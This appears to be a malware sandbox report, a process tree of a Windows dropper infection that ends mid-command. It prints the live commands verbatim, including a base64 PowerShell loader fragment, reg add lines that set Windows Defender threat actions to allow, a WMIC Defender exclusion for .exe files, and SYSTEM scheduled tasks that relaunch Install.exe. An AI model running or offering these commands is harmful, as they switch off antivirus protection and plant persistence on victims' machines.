tAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:928

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
5⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4916

C:\Users\Admin\Pictures\6xOCmKhyvWRWA8kLRIwcZuke.exe
"C:\Users\Admin\Pictures\6xOCmKhyvWRWA8kLRIwcZuke.exe"
6⤵
- Executes dropped EXE
PID:4760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 484
7⤵
- Program crash
PID:924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 524
7⤵
- Program crash
PID:1956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 780
7⤵
- Program crash
PID:2700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 788
7⤵
- Program crash
PID:2808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 820
7⤵
- Program crash
PID:2476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 852
7⤵
- Program crash
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 1048
7⤵
- Program crash
PID:1868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 1072
7⤵
- Program crash
PID:744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 1444
7⤵
- Program crash
PID:3384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "6xOCmKhyvWRWA8kLRIwcZuke.exe" /f & erase "C:\Users\Admin\Pictures\6xOCmKhyvWRWA8kLRIwcZuke.exe" & exit
7⤵
PID:4364

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "6xOCmKhyvWRWA8kLRIwcZuke.exe" /f
8⤵
- Kills process with taskkill
PID:2552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 1464
7⤵
- Program crash
PID:2044

C:\Users\Admin\Pictures\J2NHtBd30dhUI9NDb9zx4aqF.exe
"C:\Users\Admin\Pictures\J2NHtBd30dhUI9NDb9zx4aqF.exe"
6⤵
- Executes dropped EXE
PID:3820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
- Command and Scripting Interpreter: PowerShell
PID:4576

C:\Users\Admin\Pictures\J2NHtBd30dhUI9NDb9zx4aqF.exe
"C:\Users\Admin\Pictures\J2NHtBd30dhUI9NDb9zx4aqF.exe"
7⤵
PID:1408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
8⤵
- Command and Scripting Interpreter: PowerShell
PID:5836

C:\Users\Admin\Pictures\hog7t7dO6fnUh1lzX8M7VnMA.exe
"C:\Users\Admin\Pictures\hog7t7dO6fnUh1lzX8M7VnMA.exe"
6⤵
- Executes dropped EXE
PID:1160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
- Command and Scripting Interpreter: PowerShell
PID:2220

C:\Users\Admin\Pictures\hog7t7dO6fnUh1lzX8M7VnMA.exe
"C:\Users\Admin\Pictures\hog7t7dO6fnUh1lzX8M7VnMA.exe"
7⤵
PID:792

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
8⤵
- Command and Scripting Interpreter: PowerShell
PID:5668

C:\Users\Admin\Pictures\R4oZcOJIs38i3KHiWn54aELc.exe
"C:\Users\Admin\Pictures\R4oZcOJIs38i3KHiWn54aELc.exe"
6⤵
- Executes dropped EXE
PID:4964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
- Command and Scripting Interpreter: PowerShell
PID:1240

C:\Users\Admin\Pictures\R4oZcOJIs38i3KHiWn54aELc.exe
"C:\Users\Admin\Pictures\R4oZcOJIs38i3KHiWn54aELc.exe"
7⤵
PID:1100

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
8⤵
- Command and Scripting Interpreter: PowerShell
PID:5844

C:\Users\Admin\Pictures\ZZRvujv8PzIBUqrweqU2X2lK.exe
"C:\Users\Admin\Pictures\ZZRvujv8PzIBUqrweqU2X2lK.exe" /s
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936

C:\Users\Admin\Pictures\87TiwtYC2BtXF6I7wYlwBSOg.exe
"C:\Users\Admin\Pictures\87TiwtYC2BtXF6I7wYlwBSOg.exe"
6⤵
- Executes dropped EXE
PID:1340

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
- Command and Scripting Interpreter: PowerShell
PID:1432

C:\Users\Admin\Pictures\87TiwtYC2BtXF6I7wYlwBSOg.exe
"C:\Users\Admin\Pictures\87TiwtYC2BtXF6I7wYlwBSOg.exe"
7⤵
PID:1388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
8⤵
- Command and Scripting Interpreter: PowerShell
PID:5380

C:\Users\Admin\Pictures\NKbcvg1fN17bzpud2DU6qT9n.exe
"C:\Users\Admin\Pictures\NKbcvg1fN17bzpud2DU6qT9n.exe"
6⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4252

C:\Users\Admin\Pictures\SCreYqxkmitIwYNKOcYUxaQC.exe
"C:\Users\Admin\Pictures\SCreYqxkmitIwYNKOcYUxaQC.exe"
6⤵
PID:2336

C:\Users\Admin\AppData\Local\Temp\7zSE05.tmp\Install.exe
.\Install.exe /tEdidDDf "385118" /S
7⤵
PID:3036

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
8⤵
PID:2292

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
9⤵
PID:3480

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
10⤵
PID:4816

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
11⤵
PID:1560

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
9⤵
PID:1956

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
10⤵
PID:4596

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
11⤵
PID:1100

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
9⤵
PID:3524

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
10⤵
PID:256

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
11⤵
PID:1572

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
9⤵
PID:3320

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
10⤵
PID:2364

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
11⤵
PID:2452

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
9⤵
PID:4300

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
10⤵
PID:3680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
11⤵
- Command and Scripting Interpreter: PowerShell
PID:3092

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
12⤵
PID:4160

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
8⤵
PID:4576

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
9⤵
PID:488

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
10⤵
- Command and Scripting Interpreter: PowerShell
PID:4968

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
11⤵
PID:2812

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:33:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSE05.tmp\Install.exe\" it /hbVdidvYaJ 385118 /S" /V1 /F
8⤵
- Creates scheduled task(s)
PID:4380

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
8⤵
PID:4932

C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
9⤵
PID:1600

\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
10⤵
PID:4268

C:\Users\Admin\Pictures\63T7swjhi0Bmrv7HY1ZZtdqh.exe
"C:\Users\Admin\Pictures\63T7swjhi0Bmrv7HY1ZZtdqh.exe"
6⤵
PID:1480

C:\Users\Admin\AppData\Local\Temp\7zS242D.tmp\Install.exe
.\Install.exe /tEdidDDf "385118" /S
7⤵
PID:1792

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
8⤵
PID:4608

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
9⤵
PID:4596

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
10⤵
PID:648

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
11⤵
PID:4140

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
9⤵
PID:3544

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
10⤵
PID:1956

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
11⤵
PID:4740

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
9⤵
PID:5084

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
10⤵
PID:2848

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
11⤵
PID:2856

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
9⤵
PID:4304

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
10⤵
PID:2256

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
11⤵
PID:1428

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
9⤵
PID:1916

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
10⤵
PID:1060

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
11⤵
- Command and Scripting Interpreter: PowerShell
PID:2476

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
12⤵
PID:5532

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
8⤵
PID:2176

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
9⤵
PID:3092

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
10⤵
- Command and Scripting Interpreter: PowerShell
PID:2848

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
11⤵
PID:684

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:34:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS242D.tmp\Install.exe\" it /RildidBOfb 385118 /S" /V1 /F
8⤵
- Creates scheduled task(s)
PID:5412

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
8⤵
PID:5748

C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
9⤵
PID:5820

\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
10⤵
PID:6008

C:\Users\Admin\Pictures\saUG9sELeWa2FjoiEaq6ILt8.exe
"C:\Users\Admin\Pictures\saUG9sELeWa2FjoiEaq6ILt8.exe"
6⤵
PID:4748

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
5⤵
PID:1132

C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe
"C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3744

C:\Users\Admin\AppData\Local\Temp\$77935704
"C:\Users\Admin\AppData\Local\Temp\$77935704"
4⤵
PID:3408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3408 -s 436
5⤵
- Program crash
PID:4968

C:\Users\Admin\AppData\Local\Temp\$770982d4
"C:\Users\Admin\AppData\Local\Temp\$770982d4"
4⤵
PID:3300

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4760 -ip 4760
1⤵
PID:4780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4760 -ip 4760
1⤵
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 4760 -ip 4760
1⤵
PID:4620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4760 -ip 4760
1⤵
PID:1056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4760 -ip 4760
1⤵
PID:708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4760 -ip 4760
1⤵
PID:2424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4760 -ip 4760
1⤵
PID:3528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4760 -ip 4760
1⤵
PID:2800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4760 -ip 4760
1⤵
PID:2536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4760 -ip 4760
1⤵
PID:4740

C:\Users\Admin\AppData\Local\Temp\7zSE05.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSE05.tmp\Install.exe it /hbVdidvYaJ 385118 /S
1⤵
PID:2884

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
PID:1280

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
PID:648

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
PID:2872

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:2032

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
PID:4932

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
PID:2956

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:1224

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
PID:240

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
PID:4552

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:1432

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
PID:5140

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
PID:5156

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:5172

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:5188

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
PID:5208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
PID:5224

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 